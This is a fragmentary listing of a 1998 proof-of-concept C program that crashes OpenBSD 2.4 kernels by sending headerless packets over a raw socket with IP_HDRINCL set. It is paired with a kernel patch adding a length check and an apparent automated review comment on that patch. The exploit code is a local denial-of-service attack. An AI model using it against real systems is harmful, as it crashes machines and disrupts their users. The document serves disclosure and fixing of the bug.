2 * $Id: hook.c,v 1.1.1.1 2000/05/25 00:28:49 route Exp $
5 * Panics OpenBSD 2.4 kernels.
7 * Well whut doya know? Here I am working on libnet when I come up with this.
8 * Localhost OpenBSD kernel panic. No security issue (opening a raw socket already requires root). Just a kernel bug.
10 * Opening a raw IP socket and setting IP_HDRINCL and then NOT including an
11 * IP header causes problems. The code below with the `magic` numbers will
12 * cause an immediate kernel panic. Other data may cause kernel
13 * instability leading to an eventual panic or crash.
15 * Needs libnet (http://www.packetfactory.net).
17 * (c) 1998 route|daemon9 <route@infonexus.com>
22 --- raw_ip.c.old Fri Dec 11 16:48:26 1998
23 +++ raw_ip.c Fri Dec 11 16:46:59 1998
25 * don't allow both user specified and setsockopt options,
26 * and don't allow packet length sizes that will crash
28 - if ((ip->ip_hl != (sizeof (*ip) >> 2) && inp->inp_options) ||
29 - ip->ip_len > m->m_pkthdr.len) {
33 + if ((ip->ip_hl != (sizeof (*ip) >> 2) && inp->inp_options)
34 + || (ip->ip_len > m->m_pkthdr.len)
35 + || (ip->ip_len < ip->ip_hl << 2)) {
41 ip->ip_id = htons(ip_id++);
42 /* XXX prevent ip_output from overwriting header fields */
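Review bot: The added clause `(ip->ip_len < ip->ip_hl << 2)` only compares two caller-supplied fields with each other, so a header whose `ip_hl` is below the 5-word minimum and whose `ip_len` is equally small still passes the test. A floor on the header length would close that, e.g. `|| (ip->ip_hl < (sizeof (*ip) >> 2))`. Unless lines not shown here already do it, the mbuf should also be rejected when `m->m_pkthdr.len < sizeof (struct ip)` before `ip` is read at all. The comparison appears to assume `ip_len` is in host byte order at this point, and a short comment saying so would help the next reader. The hunk is shown with gaps and the enclosing function starts and ends outside it, so these points should be confirmed against the full file.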
49 main(int argc, char **argv)
54 fprintf(stderr, "PUSH THE PANIC BUTTON!\n");
56 buf = (u_char *)malloc(BUFSIZE);
59 perror("No memory for packet header");
64 * Open an IPPROTO_RAW socket and set IP_HDRINCL.
66 sock = libnet_open_raw_sock(IPPROTO_RAW);
79 *((u_short *)p) = htons(242);
81 *((u_short *)p) = htons(1);
83 libnet_write_ip(sock, buf, BUFSIZE);
84 printf("Didn't die. Try again maybe.\n");
87 return (EXIT_SUCCESS);